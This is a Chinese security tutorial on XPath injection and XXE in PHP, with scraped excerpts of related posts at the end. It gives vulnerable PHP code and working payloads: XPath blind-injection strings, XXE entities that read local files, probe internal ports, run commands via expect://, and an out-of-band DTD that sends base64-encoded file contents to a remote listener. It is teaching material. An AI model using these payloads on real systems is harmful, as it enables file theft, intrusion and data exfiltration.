XML相关的安全漏洞-XXE,XPATH小结

0x00前言:

本文主要小结以下php下的xpath查询xml结构的漏洞利用和XXE漏洞利用

xml是可扩展标记语言,它被设计出来是为了存储传输数据的。

它的结构是树形结构,并且标签要成对出现比如下面这个例子

<?xml version="1.0" encoding="utf-8"?>
<root>
  <name>sijidou</name>
  <from>
      <country>China</country>
      <city>xxxxx</city>
  </from>
</root>

把上面的代码画个示意图

0x01xpath注入:

因为xml的产生是用于存储和传输数据的

既然能够存储数据,那么本质上和数据库一样是能够被增删改查的

虽然它在实际中不像数据库一样是来存大量用户数据的,但是xml在存储配置信息上还是十分有用的

就像sql注入一样,xml文件也可以被注入,并且xml没有管理用户一说,即能访问xml文件的话,对该xml的权限是一致的

首先准备下存储数据的xml文件

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <name>sijidou</name>
    <from>
        <country>China</country>
        <city>Jiangsu</city>
    </from>
    <name>miku</name>
    <from>
        <country>Janpan</country>
        <city>null</city>
    </from>
    <name>Rose</name>
    <from>
        <country>US</country>
        <city>London</city>
    </from>
</root>

接下来使用php进行数据读取的操作

simplexml_load_file是读取xml文件

xpath是查询语句,结果以数组返回给$result。查询语句结构是每个节点间用 "/" 来隔开,之后使用标签和键值匹配的结果

<?php
    $xml = simplexml_load_file("sijidou.xml");
    $result = $xml->xpath("/root[name = ‘sijidou‘]");
    var_dump($result);
?>

这里将不同的查询语句和输出结果展示如下

查询语句

$result = $xml->xpath("/root/name");

输出值

array(3) {   [0]=> object(SimpleXMLElement)#2 (1) {     [0]=> string(7) "sijidou"   }   [1]=> object(SimpleXMLElement)#3 (1) {     [0]=> string(4) "miku"   }   [2]=> object(SimpleXMLElement)#4 (1) {     [0]=> string(4) "Rose"   } } 

查询语句

$result = $xml->xpath("/root[name = ‘sijidou‘]");

输出值

array(1) {   [0]=> object(SimpleXMLElement)#2 (2) {     ["name"]=> array(3) {       [0]=> string(7) "sijidou"       [1]=> string(4) "miku"       [2]=> string(4) "Rose"     }     ["from"]=> array(3) {       [0]=> object(SimpleXMLElement)#3 (2) {         ["country"]=> string(5) "China"         ["city"]=> string(7) "Jiangsu"       }       [1]=> object(SimpleXMLElement)#4 (2) {         ["country"]=> string(6) "Janpan"         ["city"]=> string(4) "null"       }       [2]=> object(SimpleXMLElement)#5 (2) {         ["country"]=> string(2) "US"         ["city"]=> string(6) "London"       }     }   } } 

查询语句

$result = $xml->xpath("/root/from[country = ‘China‘]");

输出值

array(1) {   [0]=> object(SimpleXMLElement)#2 (2) {     ["country"]=> string(5) "China"     ["city"]=> string(7) "Jiangsu"   } } 

从上面的结果看得出来,查询如果不是用[键=‘值‘]这种方式的查询,只会返回所有路径标签的值

如果带有[键=‘值‘]的查询,会返回和该路径相同的所有路径和该类路径之下节点的所有的值

那么查询语句结构大致清楚了,作为被存储数据的文件,一般会把某个值用户可控,然后拼接语句进行搜索

<?php
    $country = $_GET["country"];
    $xml = simplexml_load_file("sijidou.xml");
    $result = $xml->xpath("/root/from[country = ‘" . $country . "‘]");
    var_dump($result);
?>

正常的输入China,那么就会返回China和Jiangsu 2个值,但是xml查询语句有一些特殊的关键字,先介绍2个基础有用的

or      或 and     与

那么我们子GET的值传入country = ‘1‘ or ‘1‘=‘1,可以看到能查看到所有<from>的值,之前如果输入country=China,只能看到包含China的<from>标签里面的值

那么列出xml文件的所有元素

‘]|//* |a[‘拼接成完整的语句是/root/from[country = ‘‘]|//* |a[‘‘]

那么其中涉及到一些特殊表示

|   有点像linux系统命令的 && 来表示新的查询语言起始
//* 根路径下的所有参数 *是通配符

有时候没有回显的时候,就要利用判断语句进行盲注了

判断节点个数

1‘ or count(/*)=1 and ‘1‘=‘1

猜字段内容,查根节点的名字,如果按照我上面的xml文件,这里就是root

1‘ or substring(name(/*[position()=1]),1,1)=‘r‘ and ‘1‘=‘11‘ or substring(name(/*[position()=1]),2,1)=‘o‘ and ‘1‘=‘1

猜字段内容,查根节点<root>下一个节点的名字,这里是<name>

1‘ or substring(name(/root/*[position()=1]),1,1)=‘n‘ and ‘1‘=‘1

判断根节点的下一个节点个数

1‘ or count(/root/*)=3 and ‘1‘=‘1

猜节点里面内容

#查China节点1‘ or substring(/root/from/country,1,1)=‘C‘ and ‘1‘=‘1#如果是查Janpan节点的话,要在前面的from加个下标1‘ or substring(/root/from[2]/country,1,1)=‘J‘ and ‘1‘=‘1

当然还有很多利用方法,有一个叫xcat的python工具可以进行测试,有兴趣的可以去尝试

https://github.com/orf/xcat

防御手段可以通过转义单引号或者关键字识别来达到阻止注入。

0x02XXE:

XXE叫做XML外部实体注入

现在传送数据的手段除了xml,还有json了,如果说两者有什么不同,xml是树形结构,而json是键值对的关系,json的2个数据间没有结构上的关系

一般的xml文件是这样的

<?xml version="1.0" encoding="utf-8"?>
<root>
  <name>sijidou</name>
  <from>
      <country>China</country>
      <city>xxxxx</city>
  </from>
</root>

这种无法就是存储和被当做数据传递,并没有执行什么可疑的操作

但是xml有个叫做DTD(Document Type Definition)的东西

它可以规定xml里面的元素的行为,它的存在形式可以嵌套在xml文件里面,也可以单独成为一个文件,xml要使用其规则就直接添加一行引入就行

观察xml和dtd的约束规律,理论上要写java或者php或其他编程语言来检查文件,或报错。但是菜鸟教程上有个页面可以验证是否正确,但是要IE浏览器

http://www.runoob.com/xml/xml-validator.html

内部申明

<!DOCTYPE 根元素 [元素声明]>

套入上面的例子中

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root[
    <!ELEMENT root (name,from)>
    <!ELEMENT name    (#PCDATA)>
    <!ELEMENT from (country,city)>
    <!ELEMENT country (#PCDATA)>   <!ENTITY wa "China">   <!ELEMENT city (#PCDATA)>
]>
<root>
<name>sijidou</name>
<from><country>&wa;</country><city>xxxx</city>
</from>
</root>

丢到刚刚推荐的网页上去检查

假设删掉一个city的元素声明,就报错了

DTD来规定xml意味着,DTD申明的元素下面xml必须包含,并且只能含有DTD申明的元素,(#PCDATA)为可读取的字段, (name, from)表示还包含子节点,它是个根节点或者中间节点

DOCTYPE可以理解为DTD文件起始,ELEMENT是对每个节点的规定,ENTITY给变量赋值,也就像编程时候的常数变量

外部申明

<!DOCTYPE 根元素 SYSTEM "文件名">

把规则先写到一个单一的文件夹下,test_dtd.dtd

<!ELEMENT root (name,from)>
<!ELEMENT name    (#PCDATA)>
<!ELEMENT from (country,city)>
<!ELEMENT country (#PCDATA)><!ENTITY wa "China">
<!ELEMENT city (#PCDATA)>

然后在xml中引入该文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root SYSTEM "test_dtd.dtd">
<root>
<name>sijidou</name>
<from>
    <country>&wa;</country>
    <city>xxxx</city>
</from>
</root>

XXE这种攻击手段就是通过外部申明实体来完成的,因为

<!DOCTYPE root SYSTEM "file">  因为有时候是从web其他的站点引入dtd文件的,所以这个file可以带协议头,比如file://,php://filter之类的

再者可以通过ENTITY来输出变量的值,变量的值也可以是文件

那么我们可以利用把文件内容赋值给变量,然后再输出变量,就把文件内容输出来了

读取文件内容

漏洞源码

<?php
    $xmlfile =file_get_contents(‘php://input‘);
    $xml = simplexml_load_string($xmlfile);
    $xxe = $xml->xxe;
    $str = "$xxe";
    echo $str;
?>

然后是漏洞利用poc

<?xml version="1.0"?>
<!DOCTYPE root[
    <!ENTITY c SYSTEM "file:///c:/windows/win.ini">
]>
<root>
<xxe>&c;</xxe>
</root>

看到可以成功读取我本地电脑上的c:/windows/win.ini文件了,但是貌似只能支持绝对路径

端口扫描

扫描端口是利用http协议,带上目标端口地址的ip,当然请求是目标服务器发出的所以只要连了内网还能扫描内网的端口

<?xml version="1.0"?>
<!DOCTYPE root[
    <!ENTITY c SYSTEM "http://127.0.0.1:80">
]>
<root>
<xxe>&c;</xxe>
</root>

成功的回显

失败的回显

通过DTD进行信息回显

因为有时候xml是注入进去了,但是没有回显,比如以下情况

<?php
    $xmlfile =file_get_contents(‘php://input‘);
    $xml = simplexml_load_string($xmlfile);
?>

发送情况,啥都没有,但是xml是进行了加载的

那么可以通过dtd文件进行回显

原理是用加载远程的dtd文件,然后通过远程的dtd文件把file文件内容以url后面参数的形式发给远程服务器,url的get参数会记录在日志中,于是就能获得文件内容

本地发送的payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % send SYSTEM "http://10.10.10.128/evil.dtd">
%send;
]>
<root>&xml;</root>

远程的evil.dtd文件

<?xml version="1.0" encoding="utf-8"?>
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/windows/win.ini">
<!ENTITY % payload "<!ENTITY xml SYSTEM ‘http://10.10.10.128:2333/record?text=%file;‘>">
%payload;

这里的 %[空格]file 表示file这个变量,参数是 SYSTEM "..."

使用变量即%file;,之后那个单独的%payload;那一行,表示执行第三行<!ENTITY % payload .....>这条语句,不加就不会执行

利用方式,首先在远程服务器上监听2333端口

然后,burpsuite把poc发过去

回头这边的远程服务器接收到了数据了

看看wireshark的流量,也可也看到get请求

再把base64解个码就是文件的内容了

这里特别要注意几个点,因为最先测试的时候,并没有完全使用网上的poc,想试着手写以下,然后无法回显,最后仔细研究了下

参考的XXE文章没有提到

发送的payload的

<root>&xml;</root>

要和远程服务器上的evil.dtd中的为payload参数的 <!ENTITY xml SYSTEM ....>里面这个xml参数要一模一样,不然无法利用成功

<!ENTITY % payload "<!ENTITY xml SYSTEM ‘http://10.10.10.128:2333/record?text=%file;‘>">

还有一点,因为win.ini里面有空格换行或者其他奇怪的字符,如果直接发送给远程服务器当get会不和规范,所以借助php://filter进行编码处理

 远程代码执行

这种情况需要php安装并启用expect插件,那么在xxe的时候能够使用expect协议进行远程代码执行

<?xml version="1.0"?>
<!DOCTYPE root[
    <!ENTITY c SYSTEM "expect://dir">
]>
<root>
<xxe>&c;</xxe>
</root>

0x03无法利用:

我搭建的环境是win10 + phpstudy,最先使用的php版本是5.6,发现并无法利用xxe,然后测试了下所有的phpstudy上的php版本

发现5.4及以下能够利用,而5.5及以上都无法利用

从这篇文章中找到了答案:https://www.jianshu.com/p/7325b2ef8fc9

原因是xmllib2.9.0以后,是默认不解析外部实体的

这里我的php5.4的xmllib是2.7.8的

切换成php5.5,发现xmllib是2.9.4的了

0xFF结语:

参考链接

xml的攻击手段:https://www.cnblogs.com/lcamry/p/5736998.html

xpath的基础介绍:http://www.w3school.com.cn/xpath/xpath_syntax.asp

xpath注入利用:http://netsecurity.51cto.com/art/201401/427521.htm

        https://www.cnblogs.com/backlion/p/8554749.html

XXE参考:https://www.cnblogs.com/ESHLkangi/p/9245404.html

     https://www.cnblogs.com/ESHLkangi/p/9246327.html

     https://www.freebuf.com/articles/web/177979.html

     https://www.cnblogs.com/r00tuser/p/7255939.html

     https://www.jianshu.com/p/7325b2ef8fc9

原文地址:https://www.cnblogs.com/sijidou/p/10497663.html

时间: 2024-11-10 13:23:40

XML相关的安全漏洞-XXE,XPATH小结的相关文章

Pikachu-XXE(xml外部实体注入漏洞)

XXE -"xml external entity injection"既"xml外部实体注入漏洞".概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入. 具体的关于xml实体的介绍,网络上有很多,自己动手先查一下. 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就

XML的SelectNodes使用方法以及XPath(转)

XPath 是 XML 的内容,这里 SelectNodes 是 C# 中 XmlDocument 或 XmlNode 的一个方法.SelectNodes 使用 XPath 来选取节点. 重要语法 SelectNodes("item") 从当前节点的儿子节点中选择名称为 item 的节点. SelectNodes("/item") 从根节点的儿子节点中选择名称为 item 的节点. SelectNodes("//item") 从任意位置的节点上选

疯狂XML学习笔记(12)------------XPath

XPath 是一门在 XML 文档中查找信息的语言.XPath 用于在 XML 文档中通过元素和属性进行导航. 什么是 XPath? XPath 使用路径表达式在 XML 文档中进行导航 XPath 包含一个标准函数库 XPath 是 XSLT 中的主要元素 XPath 是一个 W3C 标准 XPath 路径表达式 XPath 使用路径表达式来选取 XML 文档中的节点或者节点集.这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似. XPath 标准函数 XPath 含有超过 100

PHP环境 XML外部实体注入漏洞(XXE)

XXE XXE漏洞的文章网上就很多了 文件读取 <!DOCTYPE root[ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <root><name>&xxe;</name></root> <!DOCTYPE root[ <!ENTITY xxe SYSTEM &quo

XML引用外部实体触发XXE漏洞

先记录一道题 输入框中输入的内容会被显示到上面的区域中.查看后台源码,有这样的一个片段 function XHR() { var xhr; try {xhr = new XMLHttpRequest();} catch(e) { var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"]; for (var i=0,len=IEXHRVers.length;i<

【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞分析

0x01 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123 测试网站首页: 0x01 代码分析 1.漏洞文件位置:/app/wchat/controller/Wchat.php第100

CVE-2017-0004相关lsass拒绝服务漏洞杂谈

昨天微软更新的补丁对lsass服务中的一处拒绝服务漏洞进行了修补,由于是远程拒绝服务漏洞遂决定看看(毕竟这种类型的这十几年也没出几个).补丁解压之后可以发现这次更新修改了大量的dll(可以用expand.exe,原因么,用了就知道哈哈),lsass.exe本身没有修改 可能是运气好吧,我当时直接选了lsasrv这个dll,事实证明运气不错. 可以看到这个dll是本地密码相关的动态链接库. 通过binbiff对比可以发现确实有不少修改的地方. 因此昨天都在看这个dll的补丁对比,当时找到一些可疑的

XML相关知识

XML:eXtensible Markup Language 可扩展标记语言 version="1.0" * 可扩展:所有的标签都是自定义的. * 功能:数据存储 * 配置文件 * 数据传输 * html与xml区别: * html语法松散,xml语法严格 * html做页面展示,xml做数据存储 * html所有标签都是预定义的,xml所有标签都是自定义的 xml语法: * 文档声明: * 必须写在xml文档的第一行. * 写法:<?xml version="1.0&

web.xml相关知识摘录整理

web.xml 中的listener. filter.servlet 加载顺序及其详解 在项目中总会遇到一些关于加载的优先级问题,近期也同样遇到过类似的,所以自己查找资料总结了下,下面有些是转载其他人的,毕竟人家写的不错,自己也就不重复造轮子了,只是略加点了自己的修饰. 首先可以肯定的是,加载顺序与它们在 web.xml 文件中的先后顺序无关.即不会因为 filter 写在 listener 的前面而会先加载 filter.最终得出的结论是:listener -> filter -> serv